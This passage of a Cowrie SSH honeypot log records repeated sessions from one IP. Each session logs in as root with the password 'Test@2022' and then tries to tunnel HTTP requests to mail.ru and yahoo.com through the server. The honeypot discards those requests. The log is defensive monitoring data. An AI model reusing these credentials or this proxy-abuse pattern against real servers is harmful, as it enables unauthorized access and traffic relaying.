6","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.392441Z","src_ip":"77.83.207.83","session":"59e21c17d010"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.646570Z","src_ip":"77.83.207.83","session":"59e21c17d010"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4560,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4560","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.699267Z","session":"59e21c17d010"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.750463Z","src_ip":"77.83.207.83","session":"59e21c17d010"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7272,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7272","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.893780Z","session":"59e21c17d010"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.944914Z","src_ip":"77.83.207.83","session":"59e21c17d010"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":24192,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24192","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.089549Z","session":"59e21c17d010"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.140703Z","src_ip":"77.83.207.83","session":"59e21c17d010"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.192891Z","src_ip":"77.83.207.83","session":"59e21c17d010"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23981,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b28bc68f2ed","protocol":"ssh","message":"New connection: 77.83.207.83:23981 (1.2.3.4:22) [session: 9b28bc68f2ed]","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.241245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.242632Z","src_ip":"77.83.207.83","session":"9b28bc68f2ed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.292495Z","src_ip":"77.83.207.83","session":"9b28bc68f2ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.540153Z","src_ip":"77.83.207.83","session":"9b28bc68f2ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1670,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1670","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.591077Z","session":"9b28bc68f2ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.641224Z","src_ip":"77.83.207.83","session":"9b28bc68f2ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":11721,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11721","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.784239Z","session":"9b28bc68f2ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.834053Z","src_ip":"77.83.207.83","session":"9b28bc68f2ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":2863,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2863","sensor":"my-vps","timestamp":"2025-08-31T03:51:28.976024Z","session":"9b28bc68f2ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.025656Z","src_ip":"77.83.207.83","session":"9b28bc68f2ed"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.075916Z","src_ip":"77.83.207.83","session":"9b28bc68f2ed"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24088,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb85a287684c","protocol":"ssh","message":"New connection: 77.83.207.83:24088 (1.2.3.4:22) [session: eb85a287684c]","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.125743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.126570Z","src_ip":"77.83.207.83","session":"eb85a287684c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.176749Z","src_ip":"77.83.207.83","session":"eb85a287684c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.428342Z","src_ip":"77.83.207.83","session":"eb85a287684c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6259,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6259","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.480258Z","session":"eb85a287684c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.531067Z","src_ip":"77.83.207.83","session":"eb85a287684c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":9861,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:9861","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.672693Z","session":"eb85a287684c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.722956Z","src_ip":"77.83.207.83","session":"eb85a287684c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":453,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:453","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.868769Z","session":"eb85a287684c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.919243Z","src_ip":"77.83.207.83","session":"eb85a287684c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:29.970743Z","src_ip":"77.83.207.83","session":"eb85a287684c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24221,"dst_ip":"1.2.3.4","dst_port":22,"session":"44a1ff70f60c","protocol":"ssh","message":"New connection: 77.83.207.83:24221 (1.2.3.4:22) [session: 44a1ff70f60c]","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.019023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.019666Z","src_ip":"77.83.207.83","session":"44a1ff70f60c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.069900Z","src_ip":"77.83.207.83","session":"44a1ff70f60c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.318123Z","src_ip":"77.83.207.83","session":"44a1ff70f60c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3370,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3370","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.368847Z","session":"44a1ff70f60c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.418568Z","src_ip":"77.83.207.83","session":"44a1ff70f60c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":13209,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:13209","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.560641Z","session":"44a1ff70f60c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.610493Z","src_ip":"77.83.207.83","session":"44a1ff70f60c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18679,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18679","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.752326Z","session":"44a1ff70f60c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.802342Z","src_ip":"77.83.207.83","session":"44a1ff70f60c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.852956Z","src_ip":"77.83.207.83","session":"44a1ff70f60c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24348,"dst_ip":"1.2.3.4","dst_port":22,"session":"30dbdeccdc28","protocol":"ssh","message":"New connection: 77.83.207.83:24348 (1.2.3.4:22) [session: 30dbdeccdc28]","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.902610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.903537Z","src_ip":"77.83.207.83","session":"30dbdeccdc28"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:30.953591Z","src_ip":"77.83.207.83","session":"30dbdeccdc28"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.204452Z","src_ip":"77.83.207.83","session":"30dbdeccdc28"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":182,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:182","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.255369Z","session":"30dbdeccdc28"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.306234Z","src_ip":"77.83.207.83","session":"30dbdeccdc28"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":3569,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3569","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.448620Z","session":"30dbdeccdc28"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.499003Z","src_ip":"77.83.207.83","session":"30dbdeccdc28"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":24921,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24921","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.640754Z","session":"30dbdeccdc28"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.691116Z","src_ip":"77.83.207.83","session":"30dbdeccdc28"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.741964Z","src_ip":"77.83.207.83","session":"30dbdeccdc28"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24457,"dst_ip":"1.2.3.4","dst_port":22,"session":"01281542dfb6","protocol":"ssh","message":"New connection: 77.83.207.83:24457 (1.2.3.4:22) [session: 01281542dfb6]","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.790211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.791092Z","src_ip":"77.83.207.83","session":"01281542dfb6"}
